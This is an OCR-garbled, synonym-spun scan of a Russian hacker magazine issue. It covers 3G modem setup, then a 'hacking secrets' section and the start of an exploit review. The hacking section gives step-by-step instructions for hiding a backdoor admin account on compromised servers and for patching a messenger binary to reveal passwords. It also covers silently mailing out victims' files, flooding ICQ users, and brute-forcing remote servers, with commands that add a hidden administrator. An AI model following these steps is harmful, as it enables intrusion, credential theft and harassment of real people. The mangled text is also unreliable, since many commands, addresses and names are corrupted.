программа-драйвер никак не сложнее, нежели снарядить самую обычную программу:   баг хіѵЕ Ьиаиеі.баг .Ъг2  $ ей Ьиаиеі  $ зи   # таке і п Го   Последняя бригада во зависимости с дистрибутива хорош разной.   Под ІІЬипіи сие — таке ІПБІаІІ_иЬип1:и, лещадь Мапбгаке — таке Іп5іа11_  тапбпѵа, ит.д.   Далее, суверенностью, что такое? нужные драйвера установлены на системе, не грех подступать кнастройке соединения посредством программу ѵѵѵсііаі.   Для того в надежде отнюдь не отписывать длинную команду с головы раз, во конфиг  файле /еГс/ѵѵѵбіаІ.сопІ прописывается «точка доступа»:   [Біаіег Ьиаиеі]   Мойет=/аеѵ/ССуицвО  Ваий=460800  ІпіЫ=АТ 0   Іпіб2=АТОО VI Е1 00=0 йСІ Ы)2 +РСЬАЗЗ=0  ІпібЗ=АТ+С0ВСШТ=І , "ІР" , "іпбегпеЬ.тбз.ги"     ► 046     ХАКЕР 01 /119/ 08             рс_гопе      Статистика превосходить  данных равно принятых  данных перед Ыпих"ом      Важный фаза настройки модема лещадь 0_іпих:  конфигурированиеутилиты ѵсііаі      Интерфейс МТС Коннект для того ѴѴіпсІоѵѵэ     ІЗБЫ=О   Біаі АССешрСз=1  Мосіет Туре=Б5В Мосіет  РЪопе=*99#   РЪопеІ=*99#   Бзегпате="шСз 0  Раззѵѵогсі="тСз"   АиСо БЫЗ=оп  Ыеѵ? РРРБ=уез   Вот да все. Теперь, позднее набора на рента команды ѵѵѵсііаі Ьиаѵѵеі (с через ключа Ьиаѵѵеі ты да я указываем номинация соединения, которое надлежит установить], отсоединение вследствие Е220 бросьте установлено.  Для того, с тем его задрать нужно поднажать <СМ>-С.   Соединение соединением, да ввек мягко уже да знать, который на сущий моменттворится не без; инет-каналом, а временно никакого визуаль-  ного мониторинга у нас нет. Исправить сие несложно, кабы ввести  небольшую тулзу [ Ьир://оо2ІеТт.іпІегіа.рі75гс/Ье2205ІаІТаг.Ь22 ]:   Саг х^ѵб 0іе22 0зСаС . Саг .Ът.2   ссі Ъе220зСаС*   зисіо . /сопЕідиге   зисіо таке   зисіо таке іпзСаІІ   ШД РАСШАРИВАЕМ ИНЕТ ЧЕРЕЗ ТОЧКУ ДОСТУПА   Поскольку ЗВ - сие уж настоящий интернет-канал, который, невзирая для свою мобильность, обеспечивает достойную скоростей небольшие  задержки, так его много раз используют во вкусе метод чтобы постоянного доступа во интернет. К примеру получи даче, идеже не беря в расчет спутниковой системы, дрянной альтернативы нет. Прикольно ввести ЗВ-девайс кточке  доступа, чтоб сподручно расшарить водная магистраль получай всегда компьютеры бредень до ѴѴІ-  Рі. И сие возможно, коли твоя пиксел доступа поддерживает подключения  девайсов по мнению 015В. Для эксперимента ты да я возьмем редактированный вариация  — АвивѴѴІ-бООдР. Вбычно наш брат используем альтернативную прошивку через разработчика Оіед, хотя на текущий единожды автор сих строк будем пустить в дело специаль-  ную модификацию (родом с Чехии], умышленно адаптированную для того  подключения ІІ5В-модемов чтобы работы при помощи СБМА( зУ/корреІ.  сг/ссІтаѵѵіб/сІоѵѵпІоагі/1691 . Последние версии бгтѵѵаге поддерживают  Н II АѴѴ Е I Е220 за умолчанию, т.е. исправлять нечто в добавление отнюдь не понадобится. Вам судебное дело обновления прошивки выполняется вслед за порядочно минут (пункт подбор Рігтѵѵаге ІІрдгабе]. После перезагрузкиу  тебя на кадастр появится место 015В Воппесііоп, идеже нужно поднять опцию  ІІвег бебпесі равно из через список подобрать обложка сйаі.биаѵѵеі.іаг.ді, каковой твоя милость найдешь получи нашем диске. Далее на подбор выбери «115В соппесііоп ->  Оіаі-ир Сопбд», идеже что поделаешь задать:   ІІзегпате : шЬб  Раззиогй: тСз     АРЫ: іпСегпеЕ .тСз . ги     Нажимай кнопку«Арр1у», спустя время «Ріпівб» — равно пятнышко доступа еще раз пойдет бери перезагрузку, за которой сращивание вместе с интернетом установится  автоматически.     М!І! 0 *І экономим денюжка равным образом момент   НА ИНТЕРНЕТ-ТРАФИКЕ     Какими бы выгодными ни были тарифы, после активное врачевание  мобильным интернетом доводится порядком платить. Приходится тормозить себя, экономить, отключать картинки — словом, деять все, ради балансовый отчёт неуходил на минус. Для того в надежде каплю поэкономить равным образом значительно накинуть на скорости, тебе должен эксплуатнуть  компрессоры трафика. За счетчего стало быть близкий эффект?   Эти деньги передают формулировка равно графику во сжатом виде равным образом вслед за итог сего  позвол ваш покорнейший слуга полуют строго выгнать масштаб передаваемых данных. Насколь-  ко что есть мочи отсюда следует экономить? В разы! Іоопеі.пеі- сие типический правопреемник таких компрессоров и, безграмотный во прототип другим решениям, всецело бесплатный. Утилита устанавливается на систему (поддер-  живаются самые неравные ОС] на качествелокального прокси, отчего целое сетевые программы нужно предписать платить информация вследствие прокси-  сервер: поумолчанию 027.0.0.1 :8080.Тоопе1.пеІэффеісгивножметвесь  текстовый трафик, в книга числе и вложения во почте. Болеетого, принудитель- только сжимает изображения, во результате картинки получаются не без; много  худшим качеством, так зато их неграмотный надобно отключать полностью! А  значит, скольжение старым порядком остается куда приятным.     >У*"і"Л А Л ЬТЕР НАТИВНАЯ ПРОГРАММА  ДЛЯ ПОДКЛЮЧЕНИЯ     Встроенная обслуживающая программа с целью подключения проста да хватит удобна, а для того  хакера ее возможностей безусловно недостаточно. Вместо стандартного МТ5  Соппесіог позволительно попытаться эксплуатнуть другую замечательную  утилиту — МѴѴсопп [ цуууцу.т"л/сопп.сот ]. Она безвыгодный привязана ко конкретному  оборудованию, отчего работает не без; самыми разнообразными 00/0 РВ5-  модемами.   В итоге напрямик сверху рабочем столеты можешь нажить статистику во  реальном времени объединение качеству канала, количеству использованного  трафика, уровню сигнала равно т.п. В программе допускается настроить звуковые  уведомления в случай, если бы изменится яруча (случай роуминга), сота иначе а фанфара опустится вверх критического значения.   Для того с намерением непрерывно мониторить род канала да возле этом невыгодный  тратитьлишнийтрафик, разработчики используютспециальный фигура лещадь названием «5тагІ Ріпд». Благодаря «умному пингу» проверяющие  ІСМР-пакеты отправляются всего только тогда, нет-нет да и лакомиться подозрение, зачем водная магистраль «провис», далеко не расходуя затор понапрасну. Еще одна интересная  опция -удаленноеуправление компьютером с помощью входящих  5М5-сообщений.Ты несложно можешь настроить систему таким образом, чтоб сервер по принуждению выполнил перезагрузку, разве в модем  придет доклад от содержанием «геЬооі».     ХАКЕР 01 /119/ 08     ► 047 взламывание равным образом   ХАКЕРСКИЕ СЕКРЕТЫ  ПРОСТЫХ ВЕЩЕЙ     ЛЕОНИД «ВОЮ» ОТРОЙКОВ ЛЕОНИД «СРКЭѴѴЬЕВ» ИСУПОВ ВЛАДИМИР «ООТ.ЕНВ» САВИЦКИЙ   / / / / / /     Базу Наск}     №1   кЦ-ШШ МАКСИМАЛЬНО СКРЫТЬ СВОЕ ПРИСУТСТВИЕ НА ПОЛО-  МАННОМ ДЕДИКЕ   РЕШЕНИЕ:   Вопросдолговечностиломанныхдедиков волнует многих. Никогда пунктуально неграмотный знаешь, сколько стоит проживеточередной сервер да какбыстро проснется  его админ. Существует, однако, мало-мальски заветных правил, следуя кото-  рым, твоя милость максимально продлишьжизньзахваченной машине. Итак:   1. Если у тебя естьадминские полномочия равным образом способ образовать небывалый акка-  унт во системе — безусловно ей воспользуйся. Причем, сформированный акк надлежит похоронить ото посторонних глаз. Делается сие так: запускаем  НедЕбіі (ака вычитчик реестра], ищем ветку «НКЕУ_ЬОСАЬ_МАСНШЕ\  30РТИАКЕ\Місгозобб\ИіпсІоѵгз НТ\СиггепбѴегвіол\Иіп1одоп\  ЗресіаІАссоипРвХазегЬізб», создаем параметр ОѴѴОЕО да во качест-  ве названия вбиваем термин нашего а кка, а важность указываем нулевое.  Теперь на лицо отечественный аккаунт никак не склифосовский виден во системе.   2. Следующий крупный фаза — патчинг Винды получи любимец мультфильм юзер-  ности. Касается исключительноѴѴІп ХР [ибо ѴѴіп 0к обладает подобной  фичей в соответствии с дефолту). Опять же, близ наличии определенных прав сливаем     патч (найдешь кроме труда на Гугле) да устанавливаем всистеме.   3. При работе  со доками да прочим файлом неграмотный забывай истощить стан-  дартное виндовое скрытие файлов равным образом папок. Это касается равно дефолтных  документов нашего созданного аккаунта, в книга числе пролетарский стол. Указы-  ваем на атрибутах каталога «С: ХВоситепРз ап О Зеббіпдз\имя_юзе-  ра» параметр «Скрытый» равно наслаждаемся результатом. Теперьты совер-  шенно бесцеремонно можешь проводить свое файло напрямик в десктоп :).   4. Старайся маски роватьсвои тратить  цессы на системе, а и совать  приложения во фоновом режиме.   Кроме того, малограмотный выволочка страшно сам по себе  сервер, таккакнепомерные нагруз-  ки держи проциоперативу раным-рано тож запоздно сдадуттебя из потрохами.   5. На каждый случай, загодя после пусти  тел нет-сервер (либо повесь на сис-  теме бэкдор), промежуточно под-  корректировав настройки фаера. Это  позволит тебе пока что безвыгодный однажды вернуться для  твоемулюбимомудедику, даже если неравно  админ заметиттвое при ком       {   // АсИгезз $649930   }     ЗАДАЧА:     |ИСП0ЛЬЗУЯ ЕМ5501ШСЕ КЕ5СЦЕК, ОНУЛВС И НЕМНОГО  СМЕКАЛКИ, МОДИФИЦИРОВАТЬСЯ ТАКИМ ОБРАЗОМ, ЧТОБЫ ОН  ВЫДАВАЛ ВВЕДЕННЫЙ ПАРОЛЬ ПРИ ПОМОЩИ МЕ55А6ЕВ0ХА  ЕЩЕ ДО ПРОЦЕДУРЫ АВТОРИЗАЦИИ  РЕШЕНИЕ:     Попробуем маленечко «распотрошить» ливер дір, воспользовав-  шисьуже наработанными навыками.   1. Откроем обложка дір.ехе во ЕМЗЭоигсе Певсиег-е на декомпиляции. Среди  полученных программой форм равным образом .срр-файлов найдем «тападег.срр», кото-  рый, несомненно, является менеджером паролей (говорящее название!:)).   2. Внутри файла тападег.срр содержится любопытная функция:     Откроем обложка дір.ехе около отладчиком да перейдем сообразно полученному около  помощи ЕМ5 Эоигсе Невсиегадресу (649936). Поставим здесьточку  останова равным образом запустим программу.   3. Попробуем залогиниться равным образом отдать все силы кнопку «Ок». Программа ос-  тановится получи и распишись нашей точке останова. Отсюда начинается улучшение  введенных данных авторизации. Протрассируем программупо <Е8> накануне  следующего момента:   00649А01 САКЪ дір.004678В4  00649А06 СМР ВДСЯШ РТЕ. 05: [ЕВР-8] ,0  00649А0А ДЕ ВНОРТ 0649А2Р     ѵоісі _Га:©Сса11 ТМапРогт: : ВиССопЬодіпІСІІск  (ТОЬіесЬ *8епйег)     Несложно прочувствовать (особенно, ежели провести в жизнь оный код), почто ошибаться  грамма обрабатывает факты аккаунта. В стеке в области адресу [еЪр-8 ]     ► 048     ХАКЕР 01 /119/ 08 хакинг     >> хорошенького понемножку входить парольучетной еженедельник I СО ! Попробуем маленечко  «дописать» шифр — таким образом, дабы симпатия выводил слово присутствие  помощи МеззадеВох. Скопируем на зад обмена подле помощи ко-  манды «Віпагу -> Віпагу сору» [правой кнопки мыши! механический шифр  двух инструкций, которые находятся, начиная от адреса 00649А06, равно  заменим их переходом ко нашему коду. Он короче заключать окошко, весь  казывающее пароль. Где ты да я расположим код, врядли длятебя бросьте  секретом: во конце секции заключение принимать числа свободного места (массив  ноликов, посвященный интересах выравнивания). Я выбрал базу для того нашего кода, равняющуюся 0068Р83Е. По адресу 00 049А06  располагай инструкцию ДМР 0068Р83Е. Следующим шажком горазд орфограмма кода, демонстрирующего лозунг возле помощи АРІ-функ-  ции МеззадеВохА. Переходи ко адресу 0068Е83Е равным образом начнем отливать  код. Первым делом вставим в соответствии с этому адресу (при помощи «Віпагу^  Віпагу разіе») двум инструкции, которые пишущий сии строки заменили безусловным  переходом ранее.   4. Начиная  со адреса 0068Р844, располагаем передачу параметров ради функции МеззадеВохА. Она принимает цифра значения, три с которых пишущий сии строки заменим нулями — нам они целиком безграмотный интерес-  ны. Нам важнотолько значение, которое соответствует содержимому  выводимого окна. Соответствующий указание держи стихи обязан существовать  положен на стектретьим. Выше наш брат уж выяснили: согласно адресу ЕВР-8  находится пароль, тактично уделенный нам некой функцией, требование которой располагается сообразно адресу 00649А01. Набор парамет- буерак для того функции МеззадеВохА выглядит эдак так:   0068Г844 РЬЗН 0 ; Стиль окна неважен — обнуляем  0068Е846 РСТ8Н 0 ; маргиналия окна — обнуляем  0068Р848 РТ38Н ШОКЕ РТК 08: [ЕВР-8] ; стихи окна - в этом месте достаточно слово учетной журнал  0068Р84В РТІ8Н 0 ; содержатель окна — обнуляем   5. Завершаем шифр вызовом МеззадеВохА да переходом ко инструк-  ции, следующей враз следовать переходом для написанному нами лишь что такое?  коду:   О 0 0 0 Р 0 0 О САТіТ МеззадеВохА ; выводим фраза  0068Р852 ЦМР 00649А0С ; передаем руководство дір-у   Вот равно свой адрес целиком:      Код, кой злокозненно выдал отзыв     00649А06 ЦМР 0068Р83Е   0068Е83Е СМР [ЕВР-8], О  0068Е842 ЦЕ 0068Е867  0068Е844 РОЗИ О  0068Е846 РЬЗН О  0068Р848 РЧЗН [ЕВР-8]   0068Р84В РТ38Н О  0068Р84П САЫ, МеззадеВохА  0068Е852 ЦМР 00649А0С   С охраняй оборона грамму подо новым именем, запускай нате воплощение равно  проверяй исход своего труда. К слову, за МеззадеВохА мо-  жет предлагать близкие услуги равным образом занятие журнал во файл, а сие сейчас противозакооно (как,  собственно, равно совершенно действия, которые описываются на статье, даже если они  ведут для реализации каких-то нехороших планов). Еще одна ремарка:  цір проверяет собственную «нерушимость» равным образом отказывается корпеть присутствие модификации дір.ехе-файла. Нос сим сладить адски прос-  то. Как? Разберешься! ;]      АДАЧА:     ЛЕГКО И БЫСТРО ПОЛУЧИТЬ ФАЙЛ ЖЕРТВЫ     РЕШЕНИЕ:     Итак, если бы твоя милость малограмотный просунутый кодер, а нужно ахнуть неграмотный успеешь равным образом не принимая во внимание заморочек спаять  спротрояненного компалоги/пассы/еісдовсе, почто пользу кого сего понадобится  — аплоад равно включение маленького экзешника. Вся инфа прийдет по прямой сверху мыло.  І.Аплоад. Качаем юзверю бесплатную тулзу Ьтаіі. Это консольный  почтовый клиент, весом общем 00 килобайт.   2.3апуск. Удобнее лишь стартовать с батника (.Ьа(-файлы), хоть мож-  ноизлюбойпроги, базис —  со поддержкой передаваемых парамет-  ров. Консольная бригада выглядит так:     Ьтаіі -з зтЕр . зегѵегі . ги -С коти@зегѵег2 . ги -Г оЕкодо®  зегѵегЗ .ги -1 -а «Теша»   — т «С : \Еі1е . ЕхЕ» -с   Где: зтір. зегѵегі .ги — сие каждый почтовый сервер, далеко не требующий  авторизации.   коти(азегѵег2.ги да оЕкодоИзегѵегЗ.ги — адреса получателя (твой) равным образом  отправителя (любой).     СДЛІе.ІхІ — самолично обложка чтобы отправки. Можно показать да стриптиз 0МТР-  порта, добавив параметр «-р <номер>», согласно дефолтуустановленный в качестве кого 05.   3. Если нужно вне текстовой инфы надергать файлы других фор-  матов, пользуемся утилой траскібсі (26 килобайт), вперед  доставив ее юзверю.   Запускаем:     траск -з "Тета" -б Ьойу.ЬхЕ -с арріісаііоп/ехе -о Ьобу.  тзд " не без; : \Еі1е . гаг "   Ьтаіі -з зтЕр . зегѵегі . ги -С коти@зегѵег2 . ги -Е оЕкодо®  зегѵегЗ .ги -Ь -т Ьобу.тзд     Где Ьобу.іхі — необязательная  текстовая делянка письма, а «сЛГіІе.  гаг» — обложка любого в виде интересах  отправки. Он будетпреобразован на МІМЕ-формати послан после  Ьтаіі. Единственное, аюшки? нам может  помешать: недурственно ополченный  файрвол, так его деамбулаторий — сие сейчас  отдельная тема, которая недурственно  освещена для просторах интернета.     Тихая отправка      ХАКЕР 01 /119/ 08     ► 049 хакинг     >>     №4   кУМЦЕІ ЗАФЛУДИТЬАСЮ НЕДРУГАС НЕСКОЛЬКИХ НОМЕРОВ   РЕШЕНИЕ:   В последнее времена выискать первосортный равно операторный снаряд к флуда асек следственно никак не так-то просто. Посему представляю твоему вни-  манию хватит удобное решение:   1. Сливаем от нашего ДВДутилу по-под нехитрым названием «Ріоосіег»  (респектавторуутилы — ВагТ"у). Тулза умеет являть врождённый равно поверхностный ІР-адрес пользователя, а вот и все посылать все численность сооб-  щений отлюбого гостиница — любому.   2. Запускаем флудер да указываем первый встречный приватный уин вместе с паролем (либо  указываем чуть пасс равно жмем «Соппесі»— утила самоё регнетнам номерок).      3. Выбираем жертву, причем, уин жертвы приходится бытовать на онлайне.   4 . Указываем предмет сообщения, а тоже тип: авторизация, сооб-  щение л бо оповещение по отношению добавлении.   Э.Жмем «Зіагі» равно наслаждаемся логом флуда :).   Не забывай, который рассылка — сие плохо, а флуд — сызнова хуже. Есть порядок защиты через  подобного западла, да относительно нем моя персона расскажу на следующем выпуске т.      ЗАДАЧА     ^ЗАМУТИТЬ ОФИСНОЕ ЗАПАДЛО   РЕШЕНИЕ:     Мы собираемся бери денек-другой опростать ото работы офисного служа-  щего или — или любого другого оператора ПК, перехватив включение нужных ему  прог.   1. Находим получи и распишись просторах Ьеѵопсйоаіс.ога ѵтилѵТгивИМоЕхе.   2. Прога перехватываетзапусквсехехе-шников, выводя предупрежде-  ние отом, сколько оседлый админ запретил применение <этого> приложе-  ния равно по части по всем статьям вопросам управляться для нему. Ставим прогу (займет рядом 0  секунд) и, никак не перезагружая комп, во виндовой панельке управления ищем  пункт«ТгивЫ\Іо-Ехе».   3. Перед нами пребелый равно вороной списки — Ассевв равным образом Оепу ІІ5І. В них не грех конкатенировать папки, утилам изо которых разрешен либо запрещен запуск.   Не советую удал ять с белого списка папку вместе с Виндой, прописанную в области  дефолту, неравно далеко не лов сжить со света масдай. Лучше добавим тама по сию пору диски,  которые лакомиться сверху этом компе во виде «С:», «Б:», «Е:», «Р:» ит.д. В угольный перечень добавляем папку не без; излюбленными прогами жертвы, пусть, в целях  примера, сие бросьте М5 ОІІІсе. Жмем Арріу да Ок.   4 . Заходим во X: \ШШОНЗ\зузбет32\ТгизРКІоЕхе равным образом наблюдаем обложка  «бепуехе.ехе». Именно его утила запускает возмещение всехэкзешников изо     черного списка. При замене его получай каждый второй стаким а именем бу-  дет запускаться выше- новый. Признайся, поуже появились коварные мероприятия получи тему«а аюшки? бы тама такого положить»?   5 . Так наравне наша сестра народ незлые, равным образом хотим лишь лишь только пошутить, — рисуем/ка-  чаем какую-нибудь веселую флешку сверху тему «делу время, потехе час» вместе с расширением .ехе, переименовываем на «бепуехе.ехе» равным образом заменяем необыкновенный файл.   6. Готово. Перезагружаем компьютер равным образом отходим сверху безопасное расстояние.   На отрицание коптеть Ворда, Экселя, несомненно да общей сложности офиса, локальный админ  может среагировать его переуста-  новкой, а сути обстановка сие неграмотный изменит: Я ДШУіМіМНИЦМІ все еще будетзапускаться  наша флешка из предложением  отдохнуть.   Вернуть безвыездно держи близкие места не запрещается откатом системы в дату под установкой ТгивШоЕхе от виндовое «Восстановле-  ние системы» — либо удале-  нием драйвера х: ХУШДХЖЗХ  зузбет32\агіѵегз\Ыбгизб.  зуз, либо отключением сего  драйвера с раздела Огіѵег  пункта «ТшвЫМо-Ехе» на панели  управления ѴѴі п сіоѵѵз.          Например:   ірзсап.ехе 092.168.0.1 092.168.2.2 Іод.Ехр     ЗАДАЧА:     НАИТИ И СБРУТИТЬ ЗАБУГОРНЫЙ ДЕДИК     РЕШЕНИЕ:     Как известно, дедики нужны по всем статьям равным образом всегда, то-то и есть почему кое-когда овчинка выделки стоит  заморочиться их поиском равно брутом. Как правило, дедики ищут в соответствии с откры-  тым портам 035, 039 равным образом 0900. Лучше токмо соблюдать определенного  алгоритма -   1. Сливаем скэнар ІРЭсап (либо берем не без; нашего ДВД).   2 . Запускаем равным образом указываем зона ради скана, или — или создаем батнике  содержимым:     ірзсап.ехе начало_диапазона конегщиапазона имя_лога.  рхр     Тулза шелковица сканирует охват 092.168.0.1-192.168.2.2 равно сохраняет резуль-  тат во обложка Іод.М. Кстати, твоя милость бесцеремонно можешьуказывать разом изрядно  желаемых диапазонов (для этогоудобнее итого юзатьописанный ранее  батник).   3. Указываем пакет сканируемых портов: 035, 039 да 0900 да запускаем скан.   4 . После окончания сканирования во папке со сканером появится логе  указанным тобой названием (в нашем случае — сие Іод.іхД.Учти: кабы твоя милость сканил вмиг порядочно диапазонов.тодля каждого диапазона хорэ  создан одинокий обложка слогом.   5 . Послетого, какты получил лог, его делать нечего отпарситьлибо ручной справиться сверху части во соответствии  со портами: 035, 039 равным образом 0900. Это  нужно, с намерением на дальнейшем было удобнее насчитывать списки дедиков для того брута.     ► 050     ХАКЕР 01 /119/ 08 хакинг     >>     6. Когда постоянно и точка — позволительно пускаться для бруту. Разум-  нее лишь пустить в дело тулзу ЫТвсап. Но помни, что-нибудь сия  утила брутит дедики возьми 035 равным образом 039 портах. Для проверки  5900 порта надлежит пускать в дело софтину ѴІЧСтавв,  которая позволит приконектиться для бажному дедику без участия  авторизации.   7 . Создаем свежий аккаунт на системе (после того, в духе автор сих строк  успешно сбрутили пасс нате дедик близ помощи ЫТвсап.либо  подключились вследствие ѴЫ С):   стй   пеЬ изег изег раззиогй /аскЗ  пеЬ Іосаідгоир АсІтіпізСгабог изег /айй  пеЬ Іосаідгоир "КетоЬе БезкЕор Чзегз" изег  /айй   пег ассоипрз /тахриаде : ипіітірей  ехір идеже изег — свой логин, а раззѵѵогсі — соответственно,  пароль.   8. Успешно юзаем ломанные дедики :).     Ищем дедики   ^ ■ . .     № {Іітг4 М)   Р|*гф4 [ О  Ниіглг*     Ъ        Гг Г*     I Ѵд              №7   ПОЛУЧИТЬ ИСХОДНЫЙ КОД ПРИЛОЖЕНИЯ, НАПИСАННО-  ГО НА ВОКІ.АЫО РЕІ.РНІ ИЛИ С++ ВШЮЕК   РЕШЕНИЕ:   Иногда случаются непредвиденные обстоятельства, равно первобытный адрес  приложения в сущности утерян. К счастью, сие безвыгодный издревле означает, который  придется записывать проекте самого начала. Стоит обратиться  одной с множества программ, предназначенных с целью восстановления  частей стих скомпилированного приложения. Например, утилитой ЕМБ  Зоигсе Ве5сиег. Если конспект была скомпилирована на среде Вогіапсі  йефЫ иначе С++ ВиіЫег, — лакомиться возможность возбудить и так бы крепь прило-  жения (формы, модули данных проекта, включительно свойства равным образом события).  Естественно, унаследовать операторный шифр процедур событий весть многообразно (программа неграмотный имеет встроенного декомпилятора, несомненно равно самочки альтернатива восстановления заключение во полном объеме возможно утилитарно не-  выполнимой). Но даже если заграбастывание вышеописанного каркаса позволите двушник раза отчислить время, необходимое ради восстановления утерянного  проекта. Что уже болтать по части случаях, эпизодически не терпится немножко покопошиться во  чужом коде? :)   Рассмотрим дело восстановления структуры форм программы, соб-  ранной во С++Виі1бег"е держи примере последней сборки известного по всем статьям  интернет-пейджера ОІР.   1. Запускаем БоигсеРевсиег.ехе, указываем ему конец для исследуемому  файлу (цір.ехе) да нажимаем кнопку«Ыех)».   2. Выбираем изо списка форм во столбце направо необходимые нам равным образом указы-  ваем программе, на каком виде изобличать выходную информацию (в  формате ОеІрИІ либо — либо С++ Виіісіег].   3. Нажимаем «Ыехі» равно получаем произведение — десятки файлов, содержа-  щих структуру форм равно процедур. Следует отметить, что, пусть бы процедуры  событий равным образом безграмотный содержат кода, во комментариях в середке них расположен справочник сверху местожительство кода, содержащегося во исполняемом файле.   4 . Попробуем убедиться, что-то нас безвыгодный обманывают, а адрес, который-нибудь указан во комментарии в середке шаблона функции, впрямь является  указателем сверху искомый код, намеренный на исполняемом файле.  Откроем обложка «аЬоиІІгт.срр», намоленный близ декомпилировании.  Судя объединение всему, держи его совести — выводлоготипа из версией билда (при     запуске программы). Обрати уважение держи процедуру, которая отвечает из-за работа формы:     ѵоісЗ _ГазГса11 ТАЬоиЬРогт: :РогтСгеаГе (ТОЬпееС *8епйег)  {   // Аййгезз $640160  }     Комментарий включает адрес: 04С160. Открываем программу во ОНуйбд равно загружаем во нее цір.ехе. Нажимаем <сІгІ+д> да переходим за адресу,  полученному нами быть помощи ЕМБ Зоигсе Везсиег. Как видишь, я  попали торчмя сверху зачаток процедуры. Остается вопрос, сеанс ли сие вывода формы. Ставим точку останова равно запускаем программу с целью  проверки правильности теории.   Действительно, возле выводелого отечественный брякеработал! Этоуказываетна  то, ась? адрес, вырученный программой, верный, зс     Все тайны квипа поведал нам ЕМББоигсе Вевсиег   Вішмімшг і аѵііЯіД      ХАКЕР 01 /119/ 08     ► 051      ОБЗОР эксплойтов     КОЛИЧЕСТВО КРИТИЧЕСКИХ ДЫР, ОБНАРУЖЕННЫХ В ѴѴІЫ00ѴѴ5 ЗА ПОСЛЕДНИЕ ДВА МЕСЯЦА,  ПРОСТО ПОТРЯСАЕТ ВООБРАЖЕНИЕ — ГЛАЗА РАЗБЕГАЮТСЯ, НЕ В СИЛАХ ВЫБРАТЬ, КАКИМ УЯЗ-  ВИМОСТЯМ ОТДАВАТЬ ПРЕДПОЧТЕНИЕ. К ТОМУ ЖЕ, ДЫР НАМНОГО БОЛЬШЕ, ЧЕМ КАЖЕТСЯ. С  УЯЗВИМОСТЬЮ В ООІ+ АССОЦИИРОВАН ТОЛЬКО ОДИН БЮЛЛЕТЕНЬ БЕЗОПАСНОСТИ, НО ОШИБОК  ТАМ... ІВТОМ ЧИСЛЕ, И НЕИСПРАВЛЕННЫХ!). ПО СЛОЖИВШЕЙСЯ ТРАДИЦИИ, ЗАТЫКАЯ СТАРЫЕ  ДЫРЫ, М5 УСПЕШНО ПРОБИВАЕТ НОВЫЕ.     М56ЦІ+   I I УДАЛЕННОЕ  V I ВЫПОЛНЕНИЕ  КОДА В 0ІР-ПАРСЕРЕ     >> ВгіеГ     Графическая подсистема  ѴѴІ п сі оѵѵз , реализованная во  библиотеке 001 . ОЬЬ (позже симпатия перелопачена на ООІ32 .  БЫ,], создавалась опытными  людьми, которые привыкли попервоначалу думать, а в дальнейшем кодить.  Неудивительно, аюшки? ошибки во  001 начали вскрываться всего лишь впоследствии того, на правах МісговоІН  перенесла львиную порция гра-  фического заключение от прикладного  уровня на основа (поступившись  безопасностью на угоду быст-  родействию]. Уровень квали-     фикации сотрудников ктому  времени поуже упал, а совокупно не без;  ним упало равно пошив кода. К руководящие круги рвались карьеристы, для  клавиатурам тянулись индусы равно  воинствующие пионеры, стре-  мясь сломать благообразный адрес равно сдуть его вместе с нуля. Попытка  создания улучшенной реализа-  ции графической подсистемы  (известной перед именем 001+] далеко не увенчалась успехом — новые внутренние резервы оказались поп-  росту невостребованными, а вона  ошибки полезли, равно как лешье мясо пос-  ле дождя. Значительная дробь  ошибок была ликвидирована на первыеже годы существова-  ния (3 □ I + (смотри, например,  «МісговоИ Зесигііу Виііеііп  М504-028 Ви^ег Оѵеггип      ► 052     ХАКЕР 01 /119/ 08        Товар сертифицирован. Реклама.     ВЗЛОМ      Официальный сайт группы Еѵіі Ріпдегз     іп ОРЕО Ргосеззіпд (ООІ+)   СоиШ АІІоѵѵ Сосіе Ехесиііоп» по части адресу — тісговоН.сот/  ІесЬпеі/весипІѵ/ЬиІІеІіп/МВОД-   8.тврх ). Однако дефекты  проектирования продолжают обнажаться равным образом сегодня.  Девятого октября неудовлетворительно ха-  кера Реіег ѴѴІпІег-ЗтіІб  [ЫВЗЗоЛѵѵаге) равным образом Іѵап Ргаігіс  (Еего Оау I п ібіабіѵе] независи-  мо доброжелатель с друга обнаружили  ошибку на парсере 01 Р-файлов,  приводящую ко переполнению титьки  со возможностью удален-  ного захвата управления. На  самом деле, ошибок затем куда вяще (включая неинициали-  зированные поля, используемые с целью расчеты размеров выде-  ляемых блоков памяти, да косяки     целочисленного переполнения!  — такое впечатление, почто пар-  сер программировали инда безграмотный  индусы, а чукчи. Исследование  дизассемблера ых листингов по-настоящему вызывает ворошение щетина получи голове. У меня до самого этих  пор руно стоймя стоит. Но об  этом да мы  со тобой поговорим малость позже, а не долго думая вернемся ко две обозна-  ченным хакерам, обнаружившим  ошибку переполнения во СОШР  Вігеат, длину которого, естест-  венно, сам черт неграмотный проверяет.     >>ТагдеІ5|     I Е 0.0/5Р1 , ОДІсе ХР, ОЯІсе 0007/  5Р1/5Р2/5РЗ, ѴѴогсІ 0003/5РЗ,  РоѵѵегРоіпі Ѵіе\л/ег 0007/5Р1 ,  Ехсеі Ѵіеѵѵег 0003/5РЗ, Ехсеі  Ѵіеѵѵег 0007/5РЗ.     >> Ехріоід     _ІоЬп бтііб (Вася Пупкин) с  хакерской группировки Еѵіі   Ріпдегв [ \л/ѵѵ\л/. еѵі Ібі пае га . со ■ п ) .   членом которой, к лицу говоря,  являюсь равным образом я, выпустил ехріоіі, нацарапанный для Перле. Можно  скачать в качестве кого  со официального  сайта группы — еѵіШпдегз.  сот/раІсЬТие5СІаѵ/М508 052  6РІ+ ѴиІпегаЬІІІІѵ ѵег2.1хІ . приближенно да от независимых сайтов  — весигііѵіосив.сот/сіаіа/  ѵиІпегаЫІИІев/ехрІоіІв/ЗІ 020.рІ .     >> Боіиііоп     Самое радикальное да самое  надежное приговор — отыскать да услать библиотеку ОРІрІиз .  Й11, потому как до сей времени в равной степени ее ник- ведь в действительности малограмотный использует. Ну... прагматично никто. Некоторые  приложения могут завязать  работать, вынуждая нас уста-  навливать стоит на повестке дня партия изделий  заплаток, скачать которые позволяется от зесигіМосив.сот/ЬісІ/ЗІ 020/  зоіиііоп .   М5 0ЭІ+  ПЕРЕПОЛ-  НЕНИЕКУЧИ  ВѴЕСТОВ  МАРКІІР ИАЫ6УА6Е     >> Вгіе*     МісговоО: опять оказалась держи  высоте реализации своихже  собственных стандартов. А чай  какхорошо до этого времени начиналось! В     памятном 0998 году, доколь рос-  сияне пребывали на кризисном  состоянии, МісговоД вместе от  Масгогпеб іа напряженно продвигали в рынокязыквекторной размет-  ки (Ѵесіог Магкир бапдиаде или,  сокращенно, ѴМЦ, Внедрялся дьявол из рук в руки в середку НТМб- заключение да 